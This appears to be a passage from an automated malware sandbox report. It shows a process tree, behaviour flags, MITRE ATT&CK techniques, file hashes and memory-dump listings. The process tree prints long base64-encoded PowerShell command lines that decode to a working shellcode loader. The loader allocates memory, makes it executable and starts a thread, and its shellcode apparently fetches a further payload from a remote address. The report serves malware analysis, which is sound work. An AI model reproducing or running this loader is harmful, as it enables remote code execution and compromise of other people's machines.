AOQAsAH0AZgBmACwAfQBmAGYALAB9AGYAZgAsAH0AMwAxACwAfQAzADAALAB9ADIAZQAsAH0AMwA4ACwAfQAzADAALAB9ADIAZQAsAH0AMwAyACwAfQAyAGUALAB9ADMAMgAsAH0AMwAxACwAfQAzADkALAB9ADAAMAAiADsAJABBAG4APQBBAGQAZAAtAFQAeQBwAGUAIAAtAHAAYQBzAHMAIAAtAG0AIAAkAGcAcgAgAC0ATgBhAG0AZQAgACIAUgBxACIAIAAtAG4AYQBtAGUAcwAgAG0AVQBQADsAJABBAG4APQAkAEEAbgAuAHIAZQBwAGwAYQBjAGUAKAAiAG0AVQBQACIALAAgACIAVwBpAG4AIgArACIAMwAiACsAIgAyAEYAdQBuAGMAdABpAG8AbgBzACIAKQA7AFsAYgB5AHQAZQBbAF0AXQAkAEcAbAAgAD0AIAAkAEcAbAAuAHIAZQBwAGwAYQBjAGUAKAAiAH0AIgAsACIARQBuAEgAeAAiACkALgByAGUAcABsAGEAYwBlACgAIgBFAG4ASAAiACwAIAAiADAAIgApAC4AUwBwAGwAaQB0ACgAIgAsACIAKQA7ACQASwBiAD0AMAB4ADEAMAAwADMAOwBpAGYAIAAoACQARwBsAC4ATAAgAC0AZwB0ACAAMAB4ADEAMAAwADMAKQB7ACQASwBiAD0AJABHAGwALgBMAH0AOwAkAHUAbwA9ACQAQQBuADoAOgBjAGEAbABsAG8AYwAoADAAeAAxADAAMAAzACwAIAAxACkAOwBbAFUASQBuAHQANgA0AF0AJABvAFAAWgAgAD0AIAAwADsAZgBvAHIAKAAkAGEAdwA9ADAAOwAkAGEAdwAgAC0AbABlACgAJABHAGwALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAYQB3ACsAKwApAHsAJABBAG4AOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB1AG8ALgBUAG8ASQBuAHQAMwAyACgAKQArACQAYQB3ACkALAAgACQARwBsAFsAJABhAHcAXQAsACAAMQApAH0AOwAkAEEAbgA6ADoAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgAJAB1AG8ALAAgADAAeAAxADAAMAAzACwAIAAwAHgANAAwACwAIABbAFIAZQBmAF0AJABvAFAAWgApADsAJABLAEIAUAA9AFsAaQBuAHQAXQAwAHgAMAAwADsAJABBAG4AOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAWwBpAG4AdABdADAALAAkAEsAQgBQACwAJAB1AG8ALAAwACwAMAAsADEALQAxACkAOwAnADsAJABOAFIAPQBbAEMAbwBuAHYAZQByAHQAXQA6ADoAVABvAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAWwBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkAEcAYgApACkAOwAkAFkAVAA9ACIAcABvAHcAZQByAHMAaABlAGwAbAAiADsAJABEAG0APQAiAFcAaQBuAGQAbwB3AHMAIgA7ACQAdQBIAEMAIAA9ACAAIgBDADoAXAAkAEQAbQBcAFgAYwBKAHAAUQBNAFwAJABEAG0AJABZAFQAXAB2ADEALgAwAFwAJABZAFQAIgA7ACQAdQBIAEMAIAA9ACAAJAB1AEgAQwAuAHIAZQBwAGwAYQBjAGUAKAAiAFgAYwBKACIALAAgACIAcwB5AHMAIgApADsAJAB1AEgAQwAgAD0AIAAkAHUASABDAC4AcgBlAHAAbABhAGMAZQAoACIAcABRAE0AIgAsACAAIgB3AG8AdwA2ADQAIgApADsAJABFAGUAQQByACAAPQAgACcAVAByACIAKwAiAHUAIgArACIAZQAnADsAaQBmACgAWwBlAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoASQBzADYANABCAGkAdABPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQAgAC0AZQBxACAAJwAkAEUAZQBBAHIAJwApAHsAJABZAFQAPQAgACQAdQBIAEMAfQA7ACQAZQB6AD0AIgAgACQAWQBUACAAZgBKAEgAIAAkAE4AUgAiADsAJABlAHoAPQAkAGUAegAuAHIAZQBwAGwAYQBjAGUAKAAiAGYASgBIACIALAAgACIALQBuAG8AZQB4AGkAdAAgAC0AZQAiACkAOwBpAGUAeAAgACQAZQB6AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3980

C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe
"C:\Windows\syswow64\Windowspowershell\v1.0\powershell.exe" -noexit -e JABnAHIAPQAnAFsARABsAGwASQBtAHAAbwByAHQAKAAoACIAbQBzAHYAYwByAHQALgBkACIAKwAiAGwAIgArACIAbAAiACkAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAYwBhAGwAbABvAGMAKAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAAgAHUAaQBuAHQAIABhAG0AbwB1AG4AdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlACIAKwAiAHIAIgArACIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQAiACsAIgByACIAKwAiAG4AZQBsADMAMgAuAGQAbABsACIAKQBdAHAAdQBiAGwAaQBjACAAcwB0AGEAdABpAGMAIABlAHgAdABlAHIAbgAgAEkAbgB0AFAAdAByACAAVgBpAHIAdAB1AGEAbABQAHIAbwB0AGUAYwB0ACgASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABOAGUAdwBQAHIAbwB0AGUAYwB0ACwAIABvAHUAdAAgAHUAaQBuAHQAIABvAFAAWgApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkACIAKwAiAGwAIgArACIAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAOwAkAEcAbAA9ACIAfQBlADgALAB9ADgAZgAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0ANgAwACwAfQAzADEALAB9AGQAMgAsAH0ANgA0ACwAfQA4AGIALAB9ADUAMgAsAH0AMwAwACwAfQA4ADkALAB9AGUANQAsAH0AOABiACwAfQA1ADIALAB9ADAAYwAsAH0AOABiACwAfQA1ADIALAB9ADEANAAsAH0AMwAxACwAfQBmAGYALAB9ADAAZgAsAH0AYgA3ACwAfQA0AGEALAB9ADIANgAsAH0AOABiACwAfQA3ADIALAB9ADIAOAAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AMwBjACwAfQA2ADEALAB9ADcAYwAsAH0AMAAyACwAfQAyAGMALAB9ADIAMAAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADQAOQAsAH0ANwA1ACwAfQBlAGYALAB9ADUAMgAsAH0ANQA3ACwAfQA4AGIALAB9ADUAMgAsAH0AMQAwACwAfQA4AGIALAB9ADQAMgAsAH0AMwBjACwAfQAwADEALAB9AGQAMAAsAH0AOABiACwAfQA0ADAALAB9ADcAOAAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0ANABjACwAfQAwADEALAB9AGQAMAAsAH0ANQAwACwAfQA4AGIALAB9ADUAOAAsAH0AMgAwACwAfQA4AGIALAB9ADQAOAAsAH0AMQA4ACwAfQAwADEALAB9AGQAMwAsAH0AOAA1ACwAfQBjADkALAB9ADcANAAsAH0AMwBjACwAfQA0ADkALAB9ADgAYgAsAH0AMwA0ACwAfQA4AGIALAB9ADMAMQAsAH0AZgBmACwAfQAwADEALAB9AGQANgAsAH0AMwAxACwAfQBjADAALAB9AGEAYwAsAH0AYwAxACwAfQBjAGYALAB9ADAAZAAsAH0AMAAxACwAfQBjADcALAB9ADMAOAAsAH0AZQAwACwAfQA3ADUALAB9AGYANAAsAH0AMAAzACwAfQA3AGQALAB9AGYAOAAsAH0AMwBiACwAfQA3AGQALAB9ADIANAAsAH0ANwA1ACwAfQBlADAALAB9ADUAOAAsAH0AOABiACwAfQA1ADgALAB9ADIANAAsAH0AMAAxACwAfQBkADMALAB9ADYANgAsAH0AOABiACwAfQAwAGMALAB9ADQAYgAsAH0AOABiACwAfQA1ADgALAB9ADEAYwAsAH0AMAAxACwAfQBkADMALAB9ADgAYgAsAH0AMAA0ACwAfQA4AGIALAB9ADAAMQAsAH0AZAAwACwAfQA4ADkALAB9ADQANAAsAH0AMgA0ACwAfQAyADQALAB9ADUAYgAsAH0ANQBiACwAfQA2ADEALAB9ADUAOQAsAH0ANQBhACwAfQA1ADEALAB9AGYAZgAsAH0AZQAwACwAfQA1ADgALAB9ADUAZgAsAH0ANQBhACwAfQA4AGIALAB9ADEAMgAsAH0AZQA5ACwAfQA4ADAALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADUAZAAsAH0ANgA4ACwAfQA2AGUALAB9ADYANQAsAH0ANwA0ACwAfQAwADAALAB9ADYAOAAsAH0ANwA3ACwAfQA2ADkALAB9ADYAZQAsAH0ANgA5ACwAfQA1ADQALAB9ADYAOAAsAH0ANABjACwAfQA3ADcALAB9ADIANgAsAH0AMAA3ACwAfQBmAGYALAB9AGQANQAsAH0AMwAxACwAfQBkAGIALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA2ADgALAB9ADMAYQAsAH0ANQA2ACwAfQA3ADkALAB9AGEANwAsAH0AZgBmACwAfQBkADUALAB9ADUAMwAsAH0ANQAzACwAfQA2AGEALAB9ADAAMwAsAH0ANQAzACwAfQA1ADMALAB9ADYAOAAsAH0AYgBiACwAfQAwADEALAB9ADAAMAAsAH0AMAAwACwAfQBlADgALAB9AGIAMAAsAH0AMAAwACwAfQAwADAALAB9ADAAMAAsAH0AMgBmACwAfQAzADEALAB9ADcAMgAsAH0AMwAwACwAfQA1ADAALAB9ADYAZQAsAH0ANwAwACwAfQA2AGQALAB9ADcAMAAsAH0ANABjACwAfQA3ADUALAB9ADMAOQAsAH0ANwA3ACwAfQA1ADgALAB9ADYAZQAsAH0ANAA2ACwAfQA2ADYALAB9ADQANQAsAH0ANQA1ACwAfQA3ADgALAB9ADUANQAsAH0ANABkACwAfQA1ADEALAB9ADUAYQAsAH0ANgA4ACwAfQA2ADEALAB9ADQAYQAsAH0ANAA2ACwAfQA3ADMALAB9ADcAMAAsAH0AMAAwACwAfQA1ADAALAB9ADYAOAAsAH0ANQA3ACwAfQA4ADkALAB9ADkAZgAsAH0AYwA2ACwAfQBmAGYALAB9AGQANQAsAH0AOAA5ACwAfQBjADYALAB9ADUAMwAsAH0ANgA4ACwAfQAwADAALAB9ADMAMgAsAH0AZQA4ACwAfQA4ADQALAB9ADUAMwAsAH0ANQAzACwAfQA1ADMALAB9ADUANwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AZQBiACwAfQA1ADUALAB9ADIAZQAsAH0AMwBiACwAfQBmAGYALAB9AGQANQAsAH0AOQA2ACwAfQA2AGEALAB9ADAAYQAsAH0ANQBmACwAfQA2ADgALAB9ADgAMAAsAH0AMwAzACwAfQAwADAALAB9ADAAMAAsAH0AOAA5ACwAfQBlADAALAB9ADYAYQAsAH0AMAA0ACwAfQA1ADAALAB9ADYAYQAsAH0AMQBmACwAfQA1ADYALAB9ADYAOAAsAH0ANwA1ACwAfQA0ADYALAB9ADkAZQAsAH0AOAA2ACwAfQBmAGYALAB9AGQANQAsAH0ANQAzACwAfQA1ADMALAB9ADUAMwAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMgBkACwAfQAwADYALAB9ADEAOAAsAH0ANwBiACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANQAsAH0AMQA2ACwAfQA2ADgALAB9ADgAOAAsAH0AMQAzACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQA0ADQALAB9AGYAMAAsAH0AMwA1ACwAfQBlADAALAB9AGYAZgAsAH0AZAA1ACwAfQA0AGYALAB9ADcANQAsAH0AYwBkACwAfQA2ADgALAB9AGYAMAAsAH0AYgA1ACwAfQBhADIALAB9ADUANgAsAH0AZgBmACwAfQBkADUALAB9ADYAYQAsAH0ANAAwACwAfQA2ADgALAB9ADAAMAAsAH0AMQAwACwAfQAwADAALAB9ADAAMAAsAH0ANgA4ACwAfQAwADAALAB9ADAAMAAsAH0ANAAwACwAfQAwADAALAB9ADUAMwAsAH0ANgA4ACwAfQA1ADgALAB9AGEANAAsAH0ANQAzACwAfQBlADUALAB9AGYAZgAsAH0AZAA1ACwAfQA5ADMALAB9ADUAMwAsAH0ANQAzACwAfQA4ADkALAB9AGUANwAsAH0ANQA3ACwAfQA2ADgALAB9ADAAMAAsAH0AMgAwACwAfQAwADAALAB9ADAAMAAsAH0ANQAzACwAfQA1ADYALAB9ADYAOAAsAH0AMQAyACwAfQA5ADYALAB9ADgAOQAsAH0AZQAyACwAfQBmAGYALAB9AGQANQAsAH0AOAA1ACwAfQBjADAALAB9ADcANAAsAH0AYwBkACwAfQA4AGIALAB9ADAANwAsAH0AMAAxACwAfQBjADMALAB9ADgANQAsAH0AYwAwACwAfQA3ADUALAB9AGUANQAsAH0ANQA4ACwAfQBjADMALAB9ADUAZgAsAH0AZQA4ACwAfQA2ADkALAB9AGYAZgAsAH0AZgBmACwAfQBmAGYALAB9ADMAMQAsAH0AMwAwACwAfQAyAGUALAB9ADMAOAAsAH0AMwAwACwAfQAyAGUALAB9ADMAMgAsAH0AMgBlACwAfQAzADIALAB9ADMAMQAsAH0AMwA5ACwAfQAwADAAIgA7ACQAQQBuAD0AQQBkAGQALQBUAHkAcABlACAALQBwAGEAcwBzACAALQBtACAAJABnAHIAIAAtAE4AYQBtAGUAIAAiAFIAcQAiACAALQBuAGEAbQBlAHMAIABtAFUAUAA7ACQAQQBuAD0AJABBAG4ALgByAGUAcABsAGEAYwBlACgAIgBtAFUAUAAiACwAIAAiAFcAaQBuACIAKwAiADMAIgArACIAMgBGAHUAbgBjAHQAaQBvAG4AcwAiACkAOwBbAGIAeQB0AGUAWwBdAF0AJABHAGwAIAA9ACAAJABHAGwALgByAGUAcABsAGEAYwBlACgAIgB9ACIALAAiAEUAbgBIAHgAIgApAC4AcgBlAHAAbABhAGMAZQAoACIARQBuAEgAIgAsACAAIgAwACIAKQAuAFMAcABsAGkAdAAoACIALAAiACkAOwAkAEsAYgA9ADAAeAAxADAAMAAzADsAaQBmACAAKAAkAEcAbAAuAEwAIAAtAGcAdAAgADAAeAAxADAAMAAzACkAewAkAEsAYgA9ACQARwBsAC4ATAB9ADsAJAB1AG8APQAkAEEAbgA6ADoAYwBhAGwAbABvAGMAKAAwAHgAMQAwADAAMwAsACAAMQApADsAWwBVAEkAbgB0ADYANABdACQAbwBQAFoAIAA9ACAAMAA7AGYAbwByACgAJABhAHcAPQAwADsAJABhAHcAIAAtAGwAZQAoACQARwBsAC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGEAdwArACsAKQB7ACQAQQBuADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAdQBvAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGEAdwApACwAIAAkAEcAbABbACQAYQB3AF0ALAAgADEAKQB9ADsAJABBAG4AOgA6AFYAaQByAHQAdQBhAGwAUAByAG8AdABlAGMAdAAoACQAdQBvACwAIAAwAHgAMQAwADAAMwAsACAAMAB4ADQAMAAsACAAWwBSAGUAZgBdACQAbwBQAFoAKQA7ACQASwBCAFAAPQBbAGkAbgB0AF0AMAB4ADAAMAA7ACQAQQBuADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAFsAaQBuAHQAXQAwACwAJABLAEIAUAAsACQAdQBvACwAMAAsADAALAAxAC0AMQApADsA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2020

C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\hqm2wco2\hqm2wco2.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:4416

C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE8A5.tmp" "c:\Users\Admin\AppData\Local\Temp\hqm2wco2\CSC1BFD69D519845D49B22B028B58E855E.TMP"
6⤵
PID:4456

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE8A5.tmp
MD5
978112087046de1b2d9bcd0047dba6c3

SHA1
b49f32c497f862f07ed97f6077ca76dd5dcc083b

SHA256
82379bfbbf9ae712423b446eb8e3037064848de27a1e3714aee8d789428831eb

SHA512
56f948c20533a9d8edf1faaf68691b8fc394e4476d678164ab13decd5458ff222705d21f5c6fb0ef87d5432e2e9f3d51fe33bb33b6388b7468c4b0786d936144

Download Submit
C:\Users\Admin\AppData\Local\Temp\hqm2wco2\hqm2wco2.dll
MD5
c28d79c422b29da30547e1788e4a7dde

SHA1
718a9b4b9998f54a1bbc69041d2e16a7530dd00f

SHA256
7c5c4715b90408c689aa6cc7ab02f3ffe43fb638aa220b7e9c21a91c0fd8b287

SHA512
fa4c1019dbcead0967bb560aed91a8764742c6d82c3d7f956547ebbe194716d1bfa105d6c3cb4fcf0e657013bf9bd80c026cdbe461eaceed311ebb2a2ebaea19

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hqm2wco2\CSC1BFD69D519845D49B22B028B58E855E.TMP
MD5
d8a334fe626494db655fba665ffd9371

SHA1
58b7d38843e875dff2f74b8f93894d54b7e43a07

SHA256
c27cb9d594269085e7165ab11c1d7ff4b848ba32f4830d938c13e5d7c62897eb

SHA512
fb6faf676ad768cf691fc2561b72812a584bd97d156ca0b35b6240498f5e3df0390185a2eef6877265ebc44ad0acc15dc9c8499f5e54289bd47d9c841e5e937a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hqm2wco2\hqm2wco2.0.cs
MD5
8ace1fd7fcce6f2df39ca81bdfb51be0

SHA1
39f9990095eed82cfc611dc494448ffe63ae4504

SHA256
0aa692853b727619cb4dc763c80ca9ef524961173ecb66f3ff1f9e1dbe9793a6

SHA512
65a438d673a8f75c2220fde3107023f911b22fdc7ab31a36ef9d79c7fdd4719b742e25724668ed809632fb65399e7b415010ea3e5e78406b2cd211318ab41d55

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\hqm2wco2\hqm2wco2.cmdline
MD5
fd6583b6afb3b11f190fa187cdfcc345

SHA1
0124dd35f2c1441f8fe96fd95939de28920a515b

SHA256
09627b635c44684ea31a8b979790780c8d34461ab719825dd06a41b243c4be60

SHA512
67ea6ee5e20d400ac4fef51f8213caa3c5b5f06fdee38a7eff52a9c4cd161c7da7e55a69ecb79d5286f8160e3cb4081b772b97e3ad1f333a5498e888c1255bdc

Download Submit
memory/664-121-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-122-0x00007FFACE760000-0x00007FFACF84E000-memory.dmp

Filesize
16.9MB

Download
memory/664-123-0x00007FFACC860000-0x00007FFACE755000-memory.dmp

Filesize
31.0MB

Download
memory/664-118-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-117-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-116-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-115-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-114-0x00007FF7F88F0000-0x00007FF7FBEA6000-memory.dmp

Filesize
53.7MB

Download
memory/664-335-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-334-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-333-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/664-332-0x00007FFAAC630000-0x00007FFAAC640000-memory.dmp

Filesize
64KB

Download
memory/2020-312-0x0000000007422000-0x0000000007423000-memory.dmp

Filesize
4KB

Download
memory/2020-325-0x0000000008320000-0x0000000008321000-memory.dmp

Filesize
4KB

Download
memory/2020-311-0x0000000007420000-0x0000000007421000-memory.dmp

Filesize
4KB

Download
memory/2020-305-0x0000000007320000-0x0000000007321000-memory.dmp

Filesize
4KB

Download
memory/2020-322-0x0000000007950000-0x0000000007951000-memory.dmp

Filesize
4KB

Download
memory/2020-323-0x0000000008140000-0x0000000008141000-memory.dmp

Filesize
4KB

Download
memory/2020-324-0x00000000082B0000-0x00000000082B1000-memory.dmp

Filesize
4KB

Download
memory/2020-382-0x000000000AD10000-0x000000000AD11000-memory.dmp

Filesize
4KB

Download
memory/2020-326-0x00000000087D0000-0x00000000087D1000-memory.dmp

Filesize
4KB

Download
memory/2020-327-0x0000000008800000-0x0000000008801000-memory.dmp

Filesize
4KB

Download
memory/2020-302-0x0000000000000000-mapping.dmp

Download
memory/2020-391-0x0000000007660000-0x0000000007661000-memory.dmp

Filesize
4KB

Download
memory/2020-383-0x000000000A6B0000-0x000000000A6B1000-memory.dmp

Filesize
4KB

Download
memory/2020-310-0x0000000007A60000-0x0000000007A61000-memory.dmp

Filesize
4KB

Download
memory/2020-346-0x0000000008C60000-0x0000000008C61000-memory.dmp

Filesize
4KB

Download
memory/2020-377-0x00000000099A0000-0x00000000099A1000-memory.dmp

Filesize
4KB

Download
memory/3980-291-0x000001353BA70000-0x000001353BA72000-memory.dmp

Filesize
8KB

Download
memory/3980-283-0x0000000000000000-mapping.dmp

Download
memory/3980-292-0x000001353BA73000-0x000001353BA75000-memory.dmp

Filesize
8KB

Download
memory/3992-290-0x000001CF45D43000-0x000001CF45D45000-memory.dmp

Filesize
8KB

Download
memory/3992-289-0x000001CF45D40000-0x000001CF45D42000-memory.dmp

Filesize
8KB

Download
memory/3992-278-0x000001CF5FF80000-0x000001CF5FF81000-memory.dmp

Filesize
4KB

Download
memory/3992-275-0x000001CF5FC70000-0x000001CF5FC71000-memory.dmp

Filesize
4KB

Download
memory/3992-266-0x0000000000000000-mapping.dmp

Download
memory/4416-384-0x0000000000000000-mapping.dmp

Download
memory/4456-387-0x0000000000000000-mapping.dmp

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads